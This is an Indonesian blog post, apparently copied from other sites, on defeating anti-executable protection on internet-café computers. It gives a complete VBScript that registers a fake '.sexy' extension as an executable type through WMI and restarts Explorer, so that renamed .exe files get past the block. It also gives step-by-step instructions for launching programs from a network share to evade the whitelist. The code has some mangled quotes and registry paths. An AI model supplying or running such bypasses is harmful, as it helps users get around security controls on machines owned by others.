Pusing2 semua warnet pade di kasih antiexecutable, gak bisa dech ngejailin tu warnet....?
Sambil bingung aku cari di mbah google E..... ternyata aku nemu ni Artikel..dan aku coba bisa.. Coba Aja sobat kalo di Warnet kamu ada antiexecutable nya...
Caranya ada di bawah ini : 
Cara Pertama
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonat e}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f 2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdv anced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrent VersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject(”Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
End If

Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs
jalankan…
Kemudian ubah extensi file .exe jadi .sexy Maka anda selamat dari pencekalan software anti executable. Ingat jangan disalah gunakan OK!

Sumber :http://www.indowebster.web.id

Cara kedua
Langkah I
Anda disini akan membuat “shortcut” yang menuju ke komputer anda sendiri agar “AE” tidak dapat mengetahui keberadaan software anda. Dan dari situ anda akan menjalankan software anda. Karena secara teori, cara kerja “AntiExecutable” adalah memblokir “executable” dari “directory” dengan awalan nama “driver” (C: D: dst.) yang belum masuk di dalam “log” dari “AE” itu sendiri. Sedangkan jika kita menggunkan “shortcut” awalan dari “directory” nya berubah jadi alamat “IP address” kita (192.xxx.xx.xx).

Cari tau “IP address” komputer yang anda pakai
1. buka cmd => start – run – cmd atau buka C: – WINDOWS – system32 – cmd.exe
2. ketik => “ipconfig /all” (tanpa tanda petik)
3. cari “ip address” anda disitu.

Buat sebuah “shortcut” di komputer anda
1. buat “shortcut” => click kanan – new – shortcut
2. isi lokasinya dengan IP anda tadi => \\192.xxx.xx.xx
3. “Share” folder tempat anda menaruh sofware => click kanan pada folder – sharing and security… – centang “share this folder…” – centang “allow network…”

Langkah II
Nah… disini kita tinggal melakukan eksekusi semua yang sudah kita persiapkan tadi.
Siap menjebol “Anti-Executable”
1. jalankan shortcut anda.
2. buka folder yang sudah anda sharing tadi.
3. jalankan Software dan Tarara… Berhasil… Berhasil… Horey…
Catatan
1. sebaiknya anda menggunakan software portable (100% sukses)
2. jika anda menggunakan software yang harus melakukan instalasi, pastikan sofware tersebut tidak melakukan “extracting” saat instalasi.
3. jika sofware anda harus melakukan”extracting” saat instalasi, coba lakukan “extracting” manual sebelum menjalankan software. => click kanan – extract here.


 Sumber: http://hackcenter.wordpress.com